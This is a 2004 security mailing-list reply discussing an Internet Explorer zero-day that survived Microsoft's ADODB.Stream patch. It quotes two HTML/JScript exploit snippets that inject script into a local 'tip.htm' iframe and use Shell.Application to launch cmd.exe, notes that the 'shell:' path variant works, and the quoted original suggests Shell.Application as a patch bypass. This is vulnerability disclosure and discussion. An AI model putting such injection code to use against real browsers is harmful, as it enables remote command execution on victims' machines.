Message-ID: <000501c4610b$02212e40$3200000a@alex>
Date: Sat, 03 Jul 2004 16:35:32 +0200
From: Jelmer <jkuperus@...net.nl>
To: liudieyu@...rella.name, bugtraq@...urityfocus.com,
   NTBugtraq@...tserv.ntbugtraq.com, full-disclosure@...ts.netsys.com
Subject: RE: THE VULNERABILITY STILL WORKS AFTER TODAY'S PATCH


Well, it's not quite as easy as you make it sound.
I think you only took a look at http-equiv's example I posted to full
disclosure and based your post on that. You see, this:


--snip--

<iframe src="c:\windows\web\tip.htm"
style="width:400px;height:200px;"></iframe>

<textarea id="code" style="display:none;">
  injected.
  <script language="JScript" DEFER>
    alert('attempting injection');
    var obj=new ActiveXObject("Shell.Application");
    obj.ShellExecute("cmd.exe","/c pause");
  </script>
</textarea>

<script language="javascript">
    
    function doit() {
      document.frames[0].document.body.insertAdjacentHTML('afterBegin',
document.all.code.value);
    }
    setTimeout("doit()", 2000);
</script>

--snip--

Doesn't work, it gives an access denied exception.
But this..


--snip--

<iframe src="shell:windows\web\tip.htm"
style="width:400px;height:200px;"></iframe>


<textarea id="code" style="display:none;">
  injected.
  <script language="JScript" DEFER>
    alert('attempting injection');
    var obj=new ActiveXObject("Shell.Application");
    obj.ShellExecute("cmd.exe","/c pause");
  </script>
</textarea>


<script language="javascript">
    
    function doit() {
      document.frames[0].document.body.insertAdjacentHTML('afterBegin',
document.all.code.value);
    }
    setTimeout("doit()", 2000);
</script>

--snip--


..does, notice the subtle difference.
The iframe in the 2nd example is set to shell:windows\web\tip.htm
instead of the hard-coded c:\windows\web\tip.htm
and it works. It was http-equiv who, probably by a mixture of luck and gut
instinct through experience, found this out when we were doing some mailing
back and forth to tackle some unrelated problem.
If you'd actually tried to exploit it you would have known this.


-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
liudieyu@...rella.name
Sent: zaterdag 3 juli 2004 3:28
To: bugtraq@...urityfocus.com; NTBugtraq@...tserv.ntbugtraq.com;
full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] THE INSIDER VULNERABILITY STILL WORKS AFTER
TODAY'S PATCH



FROM: Liu Die Yu - http://umbrella.name/
TO  : bugtraq@...urityfocus.com, NTBugtraq@...tserv.ntbugtraq.com,
full-disclosure@...ts.netsys.com
SUBJ: THE INSIDER VULNERABILITY STILL WORKS AFTER TODAY'S PATCH
DATE: 2004/07/03 UTC+800
BODY:

[background]
the latest 0day remote compromise exploit for internet explorer was found
being used in the wild. :-)

"the-insider" exploit was first noticed by the-insider:
http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclosure_message-2004060050
and then documented by jelmer:
http://umbrella.name/iebug.com/display-singlemessage.php?readmsg:fulldisclosure_message-2004060124
http://62.131.86.111/analysis.htm

microsoft just released:
Critical Update for Microsoft Data Access Components - Disable ADODB.Stream
object from Internet Explorer (KB870669)
http://www.microsoft.com/downloads/details.aspx?FamilyID=4D056748-C538-46F6-B7C8-2FBFD0D237E3&DisplayLang=en
which kills the old exploit.

[FIX FOR THE PATCH]
use Shell.Application instead.

[service]
both "attack service"(finding bugs) and "defense service"(securing systems):
http://umbrella.name/

[greetings]
malware( http://www.malware.com/ ) who found Shell.Application.

[signature]
LIUDIEYU
liudieyu AT umbrella . name




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

